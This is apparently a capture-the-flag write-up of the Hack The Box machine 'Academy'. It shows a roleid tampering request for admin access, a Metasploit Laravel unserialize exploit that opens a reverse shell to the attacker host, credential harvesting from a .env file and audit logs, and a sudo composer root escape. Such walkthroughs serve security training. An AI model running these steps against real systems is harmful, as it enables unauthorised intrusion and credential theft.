Academy

January 16, 2023

Box has port 80 open so we started by enumerating that. The site contains a register page so we tried to create a user and intercepted the request using Burp. The request has interesting hidden parameter roleid on submit:

POST /register.php HTTP/1.1

Host: academy.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://academy.htb/register.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

Connection: close

Cookie: PHPSESSID=mfde6jdhundfeioo61ehdoqs2l

Upgrade-Insecure-Requests: 1

uid=bolazoo&password=Password1&confirm=Password1&roleid=0

That would indicate that by changing ruleid it would be possible to elevate from regular user to admin so we tried to change roleid value from 0 to 1

After logging in the page was just static content but there was also a different login page for admin users from /admin.php and we landed on some king of admin panel. Academy admin panel

The http://dev-staging-01.academy.htb/ reveals that the page is created by laravel with debug mode on.

staging

Since it’s erroring due to some permission issues we can see the debug page which contains APP_KEY of the app. With APP_KEY we can use laravel unserialize exploit from metasploit to gain shell access to server:

msf6 exploit(unix/http/laravel_token_unserialize_exec) > use unix/http/laravel_token_unserialize_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOSTS 10.129.110.43
RHOSTS => 10.129.110.43
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
VHOST => dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.50:4444 
[*] Command shell session 2 opened (10.10.14.50:4444 -> 10.129.110.43:56018) at 2021-02-27 11:50:08 +0200

whoami
www-data

After enumerating a while we found .env-file for the Academy-webapp on /var/www/html/academy/.env and it contained some juicy information:

cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

The interesting this is SQL-password which was also valid for one of the users on the box: cry0l1t3

cry0l1t3-user is a member of adm-group which has access to read logs so next step was to enumerate logs. This took some time but finally I stumbled upon this article https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/ which tells us that if system has audit logs and enabled password logging we can view user input via aureport –tty command!

aureport --tty

NOTE - using built-in logs: /var/log/audit/audit.log                                                                                                                                            
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>                                                                                                                                              
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>                                                                                                                                        
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>                                                                                                                                                
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>                                                                                                                                                  
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>                                                                                                                                          
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delet
e>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>                                                                       
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<de
lete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete
>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<
delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>                                   
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>

As you can see we managed to get mrb3n’s password and after logging in as mrb3n and checking if we have any sudo privileged by running sudo -l we found out that mrb3n can run composer as sudo! Gtfobins (https://gtfobins.github.io/gtfobins/composer/) has a bypass for composer which allows us to get a shell as root so after running commands

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

we got root on the box!